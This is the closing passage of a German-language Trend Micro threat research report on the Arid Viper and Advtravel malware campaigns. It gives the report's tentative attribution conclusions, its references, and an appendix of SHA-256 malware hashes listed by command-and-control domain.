IP-Adressen konnten wir jedoch auch hier Verbindungen zum Gazastreifen erkennen. Obwohl die zwei Kampagnen dieselbe Infrastruktur nutzten, unterschieden sie sich deutlich in der jeweils verwendeten Taktik voneinander. Operation Arid Viper ist eine raffinierte Kampagne, die sich gegen hochrangige Personen in Unternehmen richtet, um vertrauliche Daten zu entwenden. Die C&C-Server dieser Kampagne waren sehr gut vor öffentlichem Zugriff geschützt und boten nur äußerst spärliche Ermittlungshinweise. Im Gegensatz dazu scheint Advtravel das Werk wenig erfahrener Cyberkrimineller zu sein, deren Motive offensichtlich weder finanzielle Gewinne noch Spionage sind. Diese Angreifer wirken eher wie eine Gruppe unerfahrener Anfängerhacker. Dennoch muss interessanterweise angemerkt werden, dass die Operationen Arid Viper und Advtravel neben der gemeinsamen arabischen Herkunft weitere Verbindungen aufweisen. Wir können nicht mit Sicherheit feststellen, ob die Hintermänner der Kampagnen als separate Gruppen oder Einzel personen arbeiten. Wir vermuten jedoch, dass sie Teil einer größeren Organisation sind. Es gibt verschiedene Organisationen, die sowohl mit Gaza als auch mit Ägypten in Verbindung stehen, wie die Muslimbruderschaft – eine transnationale islamistische Organisation, die 1928 in Ägypten gegründet wurde. Die Bruderschaft wurde 2011 in Ägypten legalisiert und gewann die Parlamentswahlen, bevor es 2013 durch einen Militärputsch zum Sturz der Regierung kam. Im Jahr 1987 bildeten einige mit der Bruderschaft verbundene Hilfsorganisationen die islamistische ii Widerstandsbewegung, besser bekannt als „Hamas“ – eine berüchtigte palästinensische Terrororganisation, die seit ca. 2007 die Kontrolle über den Gazastreifen ausübt. Wer auch immer die wirklichen Täter sein mögen, sie sind Teil der arabischen Welt – und damit der Beleg für eine aufkommende Generation von arabischen Hackern und Malware-Entwicklern, die ihre erklärten Feinde fest entschlossen ins Visier nehmen. Einige dieser Black-Hats, ob Söldner oder Cybersoldaten, richten ihre Angriffe aus politischer Überzeugung gezielt gegen Länder wie Israel. Wir konnten einen umfassenden Einblick in einen Cyber-Guerillakrieg gewinnen, der – von IT-Sicherheitsmedien allgemein unbeachtet – im Cyber-Untergrund geführt wird. Besonders interessant waren hierbei unsere Erkenntnisse, dass hinter den zwei spezifischen Kampagnen unterschiedliche arabische Gruppen standen, die dieselbe Netzwerkinfrastruktur zur Ausführung und Überwachung ihrer Angriffe nutzten. Hierfür gibt es zwei mögliche Erklärungen: Entweder gab es zwischen den Angriffen einen näheren Zusammenhang, was aufgrund der unterschiedlichen Taktiken und Motive eher unwahrscheinlich erscheint – oder eine übergeordnete Organisation unterstützt verschiedene arabische Gruppen bei der Ausführung von Cyber-Gewaltakten. Diese Annahme scheint eher wahrscheinlich zu sein. Sollte sich unsere Theorie bewahrheiten, werden wir in naher Zukunft zahlreiche Cyber-Angriffe mit schwerwiegenden Folgen erleben, die von arabischen Ländern ausgehen. Internetnutzer werden sich ungewollt mitten auf einem Schlachtfeld wiederfinden, das für sie nicht von großem Interesse ist. Zum jetzigen Zeitpunkt können wir leider nur gut informierte Schlussfolgerungen und Zuordnungs hinweise bieten. Eines ist jedoch klar: Unabhängig davon, ob es sich nun um eine technisch anspruchs volle und verborgene Malware oder um eine eher einfache und von Anfängern entwickelte Schad software handelt – beide hatten verheerende Folgen für die jeweiligen Opfer. Trend Micro wird daher stets weiter das Ziel verfolgen, derartige Bedrohungen aufzudecken, um unsere digitale Welt zu schützen und einen sicheren Austausch von Daten zu ermöglichen. © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper LITERATUR HINWEISE [1] The Week Ltd. (1. August 2014). The Week. „Iron Dome: How Israel’s Missile Defence System Works.” Letzter Zugriff am 12. Februar 2015, http://www.theweek.co.uk/world-news/middleeast/59368/iron-dome-how-israels-missile-defence-system-works. [2] BBC. (20. Dezember 2014). BBC. „Israel Launches Gaza Air Strike on ‘Hamas Target.’“ Letzter Zugriff am 12. Februar 2015, http://www.bbc.com/news/world-middle-east-30558922. [3] Pierluigi Paganini. (16. Dezember 2012). The Hacker News. „Yahoo Data Leak by ViRuS_HiMa, Why Do We Need Proactive Security?“ Letzter Zugriff am 12. Februar 2015, http://thehackernews.com/ 2012/12/yahoo-data-leak-by-virushima-why-do-we.html. [4] Pierluigi Paganini. (15. März 2013). Security Affairs. „XSS Vulnerability in 2shared.com reported by ViRuS_HiMa.“ Letzter Zugriff am 12. Februar 2015, http://securityaffairs.co/ wordpress/12889/hacking/xss-vulnerability-in-2shared-comreported-by-virus_hima.html. [5] Gast. (15. Dezember 2012). Pastebin. „Yahoo Data Leak by ViRuS_HiMa.” Letzter Zugriff am 12. Februar 2015, http://pastebin.com/Pxnszw7b. [6] Wikimedia Foundation Inc. (8. Februar 2015). Wikipedia. „Muslim Brotherhood.“ Letzter Zugriff am 12. Februar 2015, http://en.wikipedia.org/wiki/Muslim_Brotherhood. iii | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper ANHANG Dieser Abschnitt listet alle SHA256-Hashes im Zusammenhang mit den Operationen Arid Viper und Advtravel sowie die entsprechenden Malware-Namen auf, die von Trend Micro vergeben wurden. SHA-256-Hashes Von Trend Micro erkannt als advtravel.info 015fbc0b216d197136df8692b354bf2fc7bd6eb243e73283d861a4dbbb81a751 TROJ_STRPADT.A 17f2eb260f0b6942f80453b30f1a13235f27b7ed80d4e5815fb58ff7322fc765 TROJ_STRPADT.A 32e2b9cc92dfc1e77a85adb6a8b13c9b6264b7adb286260bd8bf6e47b6cde255 TROJ_STRPADT.A 4a581d9636a4f00a880b07f6dca1a82a866cf5713c74e722cfa9f71e08c33643 TROJ_STRPADT.A 69589b1691909fa091a901f7323515228594561bc18032f8ffde095993333ecc TROJ_STRPADT.A 6cc4869f1991df5879d0c4fc002f996a56bf11624d79ea2d34b52ceb98516425 TROJ_STRPADT.A 72be7e8903211e37bb3a4b04d7684d49ed8fb21ec3fdf6367e4eed2aa6fdc54c TROJ_STRPADT.A 856580576be62a0b14a01e9973b2fcb0c344e680b70a3b08b4ea293f84b47a59 TROJ_STRPADT.A 8c4867a434e0b279c3f7fc5baedb04753c41a79cc52da6e3148c110d82a588e8 TROJ_STRPADT.A ae38be6e54447ddf5a9f16748a749ab0c9c7524f7f4f9878e3b4940415970a19 TROJ_STRPADT.A ea94498aeeef4535ea1c876a0f7317d6049307c82f9396dc6b9e3542a6aa50a3 TROJ_STRPADT.A ahmedfaiez.info 2a375d2a9c41af31554bafb4a712097cc016d5227cb1f07652f0ef3483d5be30 TROJ_STRPSPI.A 55cee457c73aa87258a04562c9d04cd3c865608d5dd64366d9cd9bc2fe2f5dd9 TROJ_STRPSPI.A a4cebac7bf4e5faa537a6013e9ae19c683d7cdad9dd318fdd968a966dd3a3010 TROJ_STRPSPI.A iv | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper SHA-256-Hashes Von Trend Micro erkannt als cb3039dad0ebd63e40fbcdbb8a2a1cdf9f442b2870383f5d469765387d0c8ec0 TROJ_STRPSPI.A d4cb58f6167b72764a216d0ce6281d2251f02a696060eb425c9782283422a828 TROJ_STRPSPI.A flushupate.com 91d3a9c6de14197fe3be7c2b86b88b58b1f731d3e82bb0b7b11d5c75fbbed9a5 TROJ_STRPSPI.B b6ca1211159e9fd790790e49db5eb1b7a11c09f746d3135ae7a67ce8f518a403 TROJ_STRPSPI.B e18f051ac27ed29f792db49e4333adca9b1762d485a9214b5af12ffe858ca3fc TROJ_STRPSPI.B flushupdate.com 381bcf2b7fefcdade08bb6a02dc32ea535dbef9cb9a43220649916db8bcc39d8 TROJ_STRPSPI.C 502953496a40661bb6336a693371d3dd29ad96feb5e9f91a5b5ca0ad3ffbf29f TROJ_STRPSPI.C 52767ea5e20b8639433c087edf86ef91b0cb7fda46c71dcce625938a9f5d8a74 TROJ_STRPSPI.C 4436c7024366356cd04724e1d6867786f2587a6f6295fc74b3af0c02a257adba TROJ_STRPSPI.D 4619cec6310e16d30e05204b35c084aabafabdd3d3f87661774fec253a103d11 TROJ_STRPSPI.D 8eeab6635982618bebc137cf6c4795aa10010685d9c7bb6ce66932215195eed7 TROJ_STRPSPI.C 92cd7309723461918b9cd2988a26cd2199749e82636dc6628a46878db7e12db3 TROJ_STRPSPI.D 940a3ed18c4f171c9a6bccc0ab0ee8075aad6da8023e0b0e8883ca56bdddb4c7 TROJ_STRPSPI.C a348aabfd8aeec855933509c4c0b2aee78408ada89d8b51ce16b2247659b22f7 TROJ_STRPSPI.C ae35a7a1b084d09bb913b450944dc6f3205650298e58d19e3e2ee4db93a109ea TROJ_STRPSPI.C b5ba8fbc4f5c9bbf01c9a0a533ecab0735bf8e5e63116fffc570392e6faa9d18 TROJ_STRPSPI.C b7666d4a0afe5f5b5de8faa541be31bbe34ea51c3b3a3fab77937f816ac6181e TROJ_STRPSPI.C bbacf000880a46c7955a27f5dd960a6e253cd357f14f97f8472dd4fc3032f44d TROJ_STRPSPI.C bda7ea39f9105c25250f14e9e1fa3de0f51b91b04349974c7cadbbbe1c06ce2f TROJ_STRPSPI.C v | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper SHA-256-Hashes Von Trend Micro erkannt als ineltdriver.com d2ccf6fa361ceaf8cebada53bb1f9458b016ad85b74a7dc1bf4ba18774d92645 TROJ_STRPSPI.C e7b59b841e127c6fe6e02dd98292bba49bd32350b57595e09a6adab8da78235b TROJ_STRPSPI.C e810c74aefd63ce4ea674a1a961075a4d86a10b802d365b6b2b98a724d9b86db TROJ_STRPSPI.D f467c72fa8adde6ddf27150122c117a17d1d664876c2f9d87e68e06257eb1904 TROJ_STRPSPI.C linksis.info 58b48fd39ef718e5bd501f57e83b537668b13176ca682aee36402d18bd0c0733 TROJ_STRPADT.B 59d880ae82ccc3c8207b745b1b3e55119a5b62af086a1639270b1ba5b7e1893a TROJ_STRPADT.B 74d3093a51482a1eaa15e4fc8aa4b7d659d571db0570950272d7aa998aec6f49 TROJ_STRPADT.B 829b90bcf24fdf7f0298edec701c3c45b820f297dd012ac22e27e4bd295ee5f2 TROJ_STRPADT.B 9b6595980751537adf627e6107c08537de13e39752ed54c73e2b6af23e2a2769 TROJ_STRPADT.B d711dc3c75a60ca0cd2556c267e3c33cee5d677edcfe70fb88b334f08f81ece9 TROJ_STRPADT.B e850650e6982469529768988dfabadfdaa53b25abe1e0c0f0b3894b31a83b061 TROJ_STRPADT.B mediahitech.info db06c1914c82b52c9f2ee6ddffb13acde22d2227d626c41c35c163266b11d29c TROJ_STRPSPI.F mixedwork.com 177d9e42c4e2dfc3641cdc1f92815600c861501f5c880f5ab9cb642feb9b94bd TROJ_STRPSPI.F 390ef820779cd7461792f0aa4fc324cb06e1226e551a158cb87ca4db05358ef3 TROJ_STRPSPI.F 3fbdfcf1eae14daa7b2fa6b7d3fa7cf602cd6ff178483c9019e3bb0aa2bb902c TROJ_STRPSPI.F 62b10dc88df96e2d3d9cf5521a8d8372d6228fc82587bdee7f0de3c1c1d5a8bd TROJ_STRPSPI.F 6e8287bb8909baa65e5c00b853b4f66844e5cf3d7a5f8b707997c02395b93505 TROJ_STRPSPI.F vi | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper SHA-256-Hashes Von Trend Micro erkannt als 8c66812d657027f537aa43f406182ba39e9baf3785f067ade003f96397b11ec0 TROJ_STRPSPI.F a1bf0e5277f6fc962be778f182971eb4911d9c97cf27526d9e5698d514cef3c0 TROJ_STRPSPI.F a6eac7a3607713fbeb3b50d227f3742ea23aa21c50eeff8987bbba10138527a9 TROJ_STRPSPI.F b33472608ce524c2750b70c496a696ad6653b8a6ea7b474445d94cd491d255cf TROJ_STRPSPI.F bcc1a294bc63c3fa873f364bab0a7aa368d85726346106422013c270d55fec3c TROJ_STRPSPI.F bd9ab35587fdb450242b7a9ee0298c04dbd2fb254065fa004cda1ad42ac5f338 TROJ_STRPSPI.E e29647c7719696bf9d4d5aa8c8f10152b5b63b6d25969db90d9634273c0353f8 TROJ_STRPSPI.F pstcmedia.com 05eb2ecfc731ce222ebe82f6b3428fc5aa4179f7be5f328c5447317950e2d0e7 TROJ_STRPSPI.G 0d22606d24911c2128651ba0421c7c5bf7cd3eedef871c460b02b42b2417c457 TROJ_STRPSPI.G 11768a3a63458963d1d31be5c94d716b8e4f75dc1593080c2988b22cb6facaa8 TROJ_STRPSPI.G 21b9b34d4a21ee538e7908727aca5d367f8d400db920187f51be2921a696421f TROJ_STRPSPI.G 2bd901a246f0b0b90ba891ee37c2ee4f7bd30d36d307b151998769fcc23fd1cb TROJ_STRPSPI.G 33fc87cc53eb867dc89e34fe7a46d33d90cab02f84299531d2e677a507ed308c TROJ_STRPSPI.G 62f9839190e2fe50439894c667b3cbe29d64c3808cc471745e3d33b61370a340 TROJ_STRPSPI.G 694c01c9ade6258596cfafa6247da71712b2c3273bfc25ad26cb47302b8bbf4d TROJ_STRPSPI.G 74f22eced680ca26b767b4b07ba26b98536a385249d751586915b15b56509e0d TROJ_STRPSPI.G 81cc84f29a4c444724cbbfab83185866ecebc68c9c0a37f9623a4954456c4dd1 TROJ_STRPSPI.G a185dca4bd3b08bdafa80d53eec7ba792fb94b83785210049ba85477ce7c8cda TROJ_STRPSPI.G a36e2b88b2440aff13bf0473a19e4cd7b7d19e8bc96bb2fd10b991c33e18be7c TROJ_STRPSPI.G aab2cf709d095d949f662c40e9f889a8f3efa130102fc571f56a84205fdc67cb TROJ_STRPSPI.G vii | Seite © 2015 Trend Micro Incorporated Forschungsbericht zur Operation Arid Viper SHA-256-Hashes Von Trend Micro erkannt als b009a87d8de4fae3395a06b2676c483a80b10ca12c5bbc093aa71ea504a77dc7 TROJ_STRPSPI.G bb3eefa723221e2aa27c4f56f61418319ccda41b70e9e4b0375bf3bb131e974b TROJ_STRPSPI.G d09a773dab9a20e6b39176e9cf76ac6863fe388d69367407c317c71652c84b9e TROJ_STRPSPI.G dad8cf7474c71db1512e637db780f4650d30b040903d7a76840a1c099b9b8650 TROJ_STRPSPI.G e91216df556bee622e4eab8551fe534cda8f2f1056b8d8442f088a4035815dfe TROJ_STRPSPI.G plmedgroup.com 09be9911eedb9b01d8f544252fb0c74f2dadcf850f33a0b947eac740de8c2427 viii | Seite TROJ_STRPSPI.H © 2015 Trend Micro Incorporated Als weltweit führender Anbieter von Sicherheitssoftware hat Trend Micro Incorporated das Ziel, eine sichere Welt für den digitalen Datenaustausch zu schaffen. Unsere innovativen Lösungen für Privatanwender, Unternehmen und Behörden bieten mehrschichtigen Schutz für digitale Inhalte, um Daten auf Mobilgeräten, Endpunkten, Servern, an Gateways sowie in der Cloud zu schützen. Alle Lösungen werden durch cloudbasierte Bedrohungsinformationen des Trend Micro™ Smart Protection Network™ sowie mehr als 1.200 Bedrohungsexperten weltweit unterstützt. Weitere Informationen erhalten Sie unter www.trendmicro.com. ©2015 Trend Micro, Incorporated. Alle Rechte vorbehalten. Trend Micro und das Trend Micro T-Ball-Logo sind Marken oder eingetragene Marken von Trend Micro Incorporated. Alle anderen Firmen- oder Produktnamen sind Marken oder eingetragene Marken ihrer jeweiligen Eigentümer. TREND MICRO Deutschland GmbH Central & Eastern Europe Zeppelinstraße 1 85399 Hallbergmoos Tel: +49 (0) 811 88990-700 Fax: +49 (0) 811 88990-799 TREND MICRO (Schweiz) GmbH Schaffhauserstrasse 104 CH-8152 Glattbrugg Tel: +41 43 233 77 81 Fax: +41 43 233 77 83 www.trendmicro.com